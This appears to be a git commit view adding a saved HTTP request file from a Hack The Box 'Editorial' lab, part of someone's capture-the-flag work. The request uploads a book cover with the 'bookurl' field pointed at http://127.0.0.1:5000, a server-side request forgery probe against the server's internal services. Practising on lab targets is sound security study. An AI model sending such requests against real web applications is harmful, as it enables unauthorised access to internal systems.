aboutsummaryrefslogtreecommitdiff
path: root/editorial/request.txt
diff options
context:
space:
mode:
Diffstat (limited to 'editorial/request.txt')
-rw-r--r--editorial/request.txt22
1 files changed, 22 insertions, 0 deletions
diff --git a/editorial/request.txt b/editorial/request.txt
new file mode 100644
index 0000000..9e4f88f
--- /dev/null
+++ b/editorial/request.txt
@@ -0,0 +1,22 @@
+POST /upload-cover HTTP/1.1
+Host: editorial.htb
+Content-Length: 305
+Accept-Language: en-US
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4sG5ro4zgTRwZZA2
+Accept: */*
+Origin: http://editorial.htb
+Referer: http://editorial.htb/upload
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+
+------WebKitFormBoundary4sG5ro4zgTRwZZA2
+Content-Disposition: form-data; name="bookurl"
+
+http://127.0.0.1:5000
+------WebKitFormBoundary4sG5ro4zgTRwZZA2
+Content-Disposition: form-data; name="bookfile"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary4sG5ro4zgTRwZZA2--